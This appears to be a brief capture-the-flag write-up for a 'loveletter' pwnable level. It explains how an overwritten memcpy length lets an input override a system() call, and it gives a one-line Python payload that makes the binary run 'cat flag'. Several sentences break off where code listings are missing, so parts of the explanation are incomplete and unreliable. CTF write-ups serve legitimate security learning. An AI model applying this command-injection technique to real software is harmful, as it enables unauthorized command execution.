Surprisingly, before me, this pwnable level was only pwned 74 times, and there is no write up available online. So I decided to share my solution.
There is no source code, so you have to reverse engineer. The problem lies in the highlighted line of
Essentially it copies the next byte.
To solve it, we need to somehow force the
system(loveletter) call to be
The total buffer is 256 bytes memset to
\x00s. The goal is to set first memcpy byte length to 0. This will erase the first part of the love letter and will go directly to
system('cat flag <garbage>').
The solution is:
python -c "print('cat flag' + ' '*245 + '$')". Now onto why this works.
When the code above executes, we will have
eax pointing to
This will overwrite the buffer and propagate
edx used in the 1st memcpy and loaded by
mov edx, [esp+110h] (see below).
This will of course erase
echo I love and will result in
cat flag being executed.